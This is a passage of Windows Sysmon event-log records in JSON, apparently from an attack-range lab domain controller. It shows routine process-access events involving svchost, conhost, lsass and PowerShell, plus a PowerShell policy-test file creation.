l+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5284,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5285,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5286,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5287,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5288,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.140\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010D8350A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.140","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010D8350A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5289,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.156\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010D8350A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.156","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010D8350A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5290,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.172\r\nProcessGuid: {A837DB8D-032D-5F25-0000-0010D8350A00}\r\nProcessId: 4612\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gl0rw3ux.kae.ps1\r\nCreationUtcTime: 2020-08-01 05:52:45.172","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.172","ProcessGuid":"{A837DB8D-032D-5F25-0000-0010D8350A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gl0rw3ux.kae.ps1","CreationUtcTime":"2020-08-01 05:52:45.172","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5291,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.203\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010D8350A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:45.203","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032D-5F25-0000-0010D8350A00}","TargetProcessId":"4612","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:45","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5292,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:45.203\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032D-5F25-0000-0010D8350A00}\r\nTargetProcessId: 4612\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 